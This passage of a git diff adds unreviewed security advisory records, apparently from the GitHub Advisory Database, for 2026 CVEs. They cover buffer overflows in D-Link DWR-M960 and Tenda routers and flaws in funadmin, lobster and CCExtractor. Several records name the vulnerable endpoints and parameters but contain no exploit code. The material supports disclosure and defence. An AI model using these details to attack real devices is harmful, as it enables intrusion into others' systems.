{ + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2877" + }, + { + "type": "WEB", + "url": "https://github.com/master-abc/cve/issues/39" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347130" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347130" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754703" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T19:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7597-723j-pwr9/GHSA-7597-723j-pwr9.json b/advisories/unreviewed/2026/02/GHSA-7597-723j-pwr9/GHSA-7597-723j-pwr9.json new file mode 100644 index 0000000000000..ade1e0ce092ae --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7597-723j-pwr9/GHSA-7597-723j-pwr9.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7597-723j-pwr9", + "modified": "2026-02-21T21:30:27Z", + "published": "2026-02-21T21:30:27Z", + "aliases": [ + "CVE-2026-2885" + ], + "details": "A security flaw has been discovered in D-Link DWR-M960 1.01.07. The impacted element is the function sub_469104 of the file /boafrm/formIpv6Setup. The manipulation of the argument submit-url results in stack-based buffer overflow. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2885" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/19" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347179" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347179" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754496" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T21:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9j32-rfj4-grgw/GHSA-9j32-rfj4-grgw.json b/advisories/unreviewed/2026/02/GHSA-9j32-rfj4-grgw/GHSA-9j32-rfj4-grgw.json new file mode 100644 index 0000000000000..e128966847add --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9j32-rfj4-grgw/GHSA-9j32-rfj4-grgw.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9j32-rfj4-grgw", + "modified": "2026-02-21T21:30:27Z", + "published": "2026-02-21T21:30:27Z", + "aliases": [ + "CVE-2026-2882" + ], + "details": "A vulnerability was found in D-Link DWR-M960 1.01.07. This issue affects the function sub_46385C of the file /boafrm/formDosCfg. Performing a manipulation of the argument submit-url results in stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been made public and could be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2882" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/16" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347176" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347176" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754487" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T20:16:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mr72-9cxv-g662/GHSA-mr72-9cxv-g662.json b/advisories/unreviewed/2026/02/GHSA-mr72-9cxv-g662/GHSA-mr72-9cxv-g662.json new file mode 100644 index 0000000000000..237285b90774a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mr72-9cxv-g662/GHSA-mr72-9cxv-g662.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mr72-9cxv-g662", + "modified": "2026-02-21T21:30:27Z", + "published": "2026-02-21T21:30:27Z", + "aliases": [ + "CVE-2026-2886" + ], + "details": "A weakness has been identified in Tenda A21 1.0.0.0. This affects the function set_device_name of the file /goform/SetOnlineDevName. This manipulation of the argument devName causes stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2886" + }, + { + "type": "WEB", + "url": "https://github.com/QIU-DIE/cve-nneeww/issues/6" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347180" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347180" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754640" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T21:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q2r4-399v-qv3c/GHSA-q2r4-399v-qv3c.json b/advisories/unreviewed/2026/02/GHSA-q2r4-399v-qv3c/GHSA-q2r4-399v-qv3c.json new file mode 100644 index 0000000000000..5627cb3ee33a1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q2r4-399v-qv3c/GHSA-q2r4-399v-qv3c.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q2r4-399v-qv3c", + "modified": "2026-02-21T21:30:27Z", + "published": "2026-02-21T21:30:27Z", + "aliases": [ + "CVE-2026-2881" + ], + "details": "A vulnerability has been found in D-Link DWR-M960 1.01.07. This vulnerability affects the function sub_425FF8 of the file /boafrm/formFirewallAdv of the component Advanced Firewall Configuration Endpoint. Such manipulation of the argument submit-url leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2881" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/15" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347175" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347175" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754486" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T20:16:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v43p-pv9w-gqmf/GHSA-v43p-pv9w-gqmf.json b/advisories/unreviewed/2026/02/GHSA-v43p-pv9w-gqmf/GHSA-v43p-pv9w-gqmf.json new file mode 100644 index 0000000000000..4638269f7db79 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v43p-pv9w-gqmf/GHSA-v43p-pv9w-gqmf.json @@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v43p-pv9w-gqmf", + "modified": "2026-02-21T21:30:27Z", + "published": "2026-02-21T21:30:27Z", + "aliases": [ + "CVE-2026-2887" + ], + "details": "A security vulnerability has been detected in aardappel lobster up to 2025.4. This impacts the function lobster::TypeName in the library dev/src/lobster/idents.h. Such manipulation leads to uncontrolled recursion. The attack can only be performed from a local environment. The exploit has been disclosed publicly and may be used. Upgrading to version 2026.1 will fix this issue. The name of the patch is 8ba49f98ccfc9734ef352146806433a41d9f9aa6. It is advisable to upgrade the affected component.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2887" + }, + { + "type": "WEB", + "url": "https://github.com/aardappel/lobster/issues/397" + }, + { + "type": "WEB", + "url": "https://github.com/aardappel/lobster/issues/397#issuecomment-3849015088" + }, + { + "type": "WEB", + "url": "https://github.com/aardappel/lobster/commit/8ba49f98ccfc9734ef352146806433a41d9f9aa6" + }, + { + "type": "WEB", + "url": "https://github.com/aardappel/lobster" + }, + { + "type": "WEB", + "url": "https://github.com/aardappel/lobster/releases/tag/v2026.1" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0204/blob/main/lob3/repro.lobster" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347181" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347181" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755026" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T21:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vgp4-r46f-r9x7/GHSA-vgp4-r46f-r9x7.json b/advisories/unreviewed/2026/02/GHSA-vgp4-r46f-r9x7/GHSA-vgp4-r46f-r9x7.json new file mode 100644 index 0000000000000..cedafbf2f830e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vgp4-r46f-r9x7/GHSA-vgp4-r46f-r9x7.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vgp4-r46f-r9x7", + "modified": "2026-02-21T21:30:27Z", + "published": "2026-02-21T21:30:27Z", + "aliases": [ + "CVE-2026-2883" + ], + "details": "A vulnerability was determined in D-Link DWR-M960 1.01.07. Impacted is the function sub_427D74 of the file /boafrm/formIpQoS. Executing a manipulation of the argument submit-url can lead to stack-based buffer overflow. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2883" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/17" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347177" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347177" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754490" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T20:16:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w4gp-396m-45pm/GHSA-w4gp-396m-45pm.json b/advisories/unreviewed/2026/02/GHSA-w4gp-396m-45pm/GHSA-w4gp-396m-45pm.json new file mode 100644 index 0000000000000..74e42168b7dba --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w4gp-396m-45pm/GHSA-w4gp-396m-45pm.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w4gp-396m-45pm", + "modified": "2026-02-21T21:30:27Z", + "published": "2026-02-21T21:30:27Z", + "aliases": [ + "CVE-2026-2884" + ], + "details": "A vulnerability was identified in D-Link DWR-M960 1.01.07. The affected element is the function sub_41914C of the file /boafrm/formWanConfigSetup of the component WAN Interface Setting Handler. The manipulation of the argument submit-url leads to stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit is publicly available and might be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2884" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/18" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347178" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347178" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754493" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T21:16:10Z" + } +} \ No newline at end of file From 493d9913b9a0f2e1df9a3ed1ab35901d0757233d Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 22 Feb 2026 00:32:47 +0000 Subject: [PATCH 40/77] Publish Advisories GHSA-5m2g-4cf6-c3rg GHSA-8hhx-xq9j-xwfj GHSA-fmr2-m7gc-577w GHSA-pc25-pwr8-gpp2 --- .../GHSA-5m2g-4cf6-c3rg.json | 56 +++++++++++++++ .../GHSA-8hhx-xq9j-xwfj.json | 56 +++++++++++++++ .../GHSA-fmr2-m7gc-577w.json | 56 +++++++++++++++ .../GHSA-pc25-pwr8-gpp2.json | 72 +++++++++++++++++++ 4 files changed, 240 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-5m2g-4cf6-c3rg/GHSA-5m2g-4cf6-c3rg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8hhx-xq9j-xwfj/GHSA-8hhx-xq9j-xwfj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fmr2-m7gc-577w/GHSA-fmr2-m7gc-577w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pc25-pwr8-gpp2/GHSA-pc25-pwr8-gpp2.json diff --git a/advisories/unreviewed/2026/02/GHSA-5m2g-4cf6-c3rg/GHSA-5m2g-4cf6-c3rg.json b/advisories/unreviewed/2026/02/GHSA-5m2g-4cf6-c3rg/GHSA-5m2g-4cf6-c3rg.json new file mode 100644 index 0000000000000..5e2db77238780 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5m2g-4cf6-c3rg/GHSA-5m2g-4cf6-c3rg.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5m2g-4cf6-c3rg", + "modified": "2026-02-22T00:31:01Z", + "published": "2026-02-22T00:31:01Z", + "aliases": [ + "CVE-2026-2896" + ], + "details": "A weakness has been identified in funadmin up to 7.1.0-rc4. This affects the function setConfig of the file app/backend/controller/Ajax.php of the component Configuration Handler. Executing a manipulation can lead to improper authorization. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2896" + }, + { + "type": "WEB", + "url": "https://github.com/I4m6da/CVE/issues/3" + }, + { + "type": "WEB", + "url": "https://github.com/I4m6da/CVE/issues/3#issue-3884949083" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347207" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347207" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753972" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-266" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T00:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8hhx-xq9j-xwfj/GHSA-8hhx-xq9j-xwfj.json b/advisories/unreviewed/2026/02/GHSA-8hhx-xq9j-xwfj/GHSA-8hhx-xq9j-xwfj.json new file mode 100644 index 0000000000000..2d535154c3d00 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8hhx-xq9j-xwfj/GHSA-8hhx-xq9j-xwfj.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8hhx-xq9j-xwfj", + "modified": "2026-02-22T00:31:01Z", + "published": "2026-02-22T00:31:01Z", + "aliases": [ + "CVE-2026-2894" + ], + "details": "A vulnerability was identified in funadmin up to 7.1.0-rc4. Affected by this vulnerability is the function getMember of the file app/frontend/view/login/forget.html. Such manipulation leads to information disclosure. The attack may be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2894" + }, + { + "type": "WEB", + "url": "https://github.com/I4m6da/CVE/issues/1" + }, + { + "type": "WEB", + "url": "https://github.com/I4m6da/CVE/issues/1#issue-3884896592" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347205" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347205" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753969" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T23:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fmr2-m7gc-577w/GHSA-fmr2-m7gc-577w.json b/advisories/unreviewed/2026/02/GHSA-fmr2-m7gc-577w/GHSA-fmr2-m7gc-577w.json new file mode 100644 index 0000000000000..0a82171982548 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fmr2-m7gc-577w/GHSA-fmr2-m7gc-577w.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fmr2-m7gc-577w", + "modified": "2026-02-22T00:31:01Z", + "published": "2026-02-22T00:31:01Z", + "aliases": [ + "CVE-2026-2895" + ], + "details": "A security flaw has been discovered in funadmin up to 7.1.0-rc4. Affected by this issue is the function repass of the file app/frontend/controller/Member.php. Performing a manipulation of the argument forget_code/vercode results in weak password recovery. Remote exploitation of the attack is possible. The attack's complexity is rated as high. The exploitation is known to be difficult. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2895" + }, + { + "type": "WEB", + "url": "https://github.com/I4m6da/CVE/issues/2" + }, + { + "type": "WEB", + "url": "https://github.com/I4m6da/CVE/issues/2#issue-3884919985" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347206" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347206" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753971" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-640" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T23:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pc25-pwr8-gpp2/GHSA-pc25-pwr8-gpp2.json b/advisories/unreviewed/2026/02/GHSA-pc25-pwr8-gpp2/GHSA-pc25-pwr8-gpp2.json new file mode 100644 index 0000000000000..66b1deda3652e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pc25-pwr8-gpp2/GHSA-pc25-pwr8-gpp2.json @@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pc25-pwr8-gpp2", + "modified": "2026-02-22T00:31:01Z", + "published": "2026-02-22T00:31:01Z", + "aliases": [ + "CVE-2026-2889" + ], + "details": "A vulnerability was detected in CCExtractor up to 0.96.5. Affected is the function processmp4 in the library src/lib_ccx/mp4.c. Performing a manipulation results in use after free. The attack is only possible with local access. The exploit is now public and may be used. Upgrading to version 0.96.6 is able to address this issue. The patch is named fd7271bae238ccb3ae8a71304ea64f0886324925. You should upgrade the affected component.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2889" + }, + { + "type": "WEB", + "url": "https://github.com/CCExtractor/ccextractor/issues/2055" + }, + { + "type": "WEB", + "url": "https://github.com/CCExtractor/ccextractor/pull/2057" + }, + { + "type": "WEB", + "url": "https://github.com/CCExtractor/ccextractor/commit/fd7271bae238ccb3ae8a71304ea64f0886324925" + }, + { + "type": "WEB", + "url": "https://github.com/CCExtractor/ccextractor" + }, + { + "type": "WEB", + "url": "https://github.com/CCExtractor/ccextractor/releases/tag/v0.96.6" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0123/blob/main/cc3/repro" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347182" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347182" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755029" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T22:15:59Z" + } +} \ No newline at end of file From 963212444aefac6c43168dd73867ba3a317d2c55 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 22 Feb 2026 03:32:04 +0000 Subject: [PATCH 41/77] Publish Advisories GHSA-2665-m8rg-c7xp GHSA-2hp3-cccc-h69r GHSA-7948-p5vf-r2m4 GHSA-83cp-rj94-v2g2 GHSA-8pgv-26pm-rgm8 GHSA-gcxp-xg77-798j GHSA-jcjg-5j5x-r2hc GHSA-jgr4-277v-42mv GHSA-rfh7-7v27-6p9r --- .../GHSA-2665-m8rg-c7xp.json | 56 +++++++++++++++ .../GHSA-2hp3-cccc-h69r.json | 56 +++++++++++++++ .../GHSA-7948-p5vf-r2m4.json | 68 +++++++++++++++++++ .../GHSA-83cp-rj94-v2g2.json | 56 +++++++++++++++ .../GHSA-8pgv-26pm-rgm8.json | 56 +++++++++++++++ .../GHSA-gcxp-xg77-798j.json | 56 +++++++++++++++ .../GHSA-jcjg-5j5x-r2hc.json | 52 ++++++++++++++ .../GHSA-jgr4-277v-42mv.json | 56 +++++++++++++++ .../GHSA-rfh7-7v27-6p9r.json | 56 +++++++++++++++ 9 files changed, 512 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-2665-m8rg-c7xp/GHSA-2665-m8rg-c7xp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2hp3-cccc-h69r/GHSA-2hp3-cccc-h69r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7948-p5vf-r2m4/GHSA-7948-p5vf-r2m4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-83cp-rj94-v2g2/GHSA-83cp-rj94-v2g2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8pgv-26pm-rgm8/GHSA-8pgv-26pm-rgm8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gcxp-xg77-798j/GHSA-gcxp-xg77-798j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jcjg-5j5x-r2hc/GHSA-jcjg-5j5x-r2hc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jgr4-277v-42mv/GHSA-jgr4-277v-42mv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rfh7-7v27-6p9r/GHSA-rfh7-7v27-6p9r.json diff --git a/advisories/unreviewed/2026/02/GHSA-2665-m8rg-c7xp/GHSA-2665-m8rg-c7xp.json b/advisories/unreviewed/2026/02/GHSA-2665-m8rg-c7xp/GHSA-2665-m8rg-c7xp.json new file mode 100644 index 0000000000000..b13dfddc271a6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2665-m8rg-c7xp/GHSA-2665-m8rg-c7xp.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2665-m8rg-c7xp", + "modified": "2026-02-22T03:30:26Z", + "published": "2026-02-22T03:30:26Z", + "aliases": [ + "CVE-2026-2908" + ], + "details": "A security vulnerability has been detected in Tenda HG9 300001138. Affected by this issue is some unknown functionality of the file /boaform/formLoopBack of the component Loopback Detection Configuration Endpoint. Such manipulation of the argument Ethtype leads to stack-based buffer overflow. The attack can be executed remotely. The exploit has been disclosed publicly and may be used.", 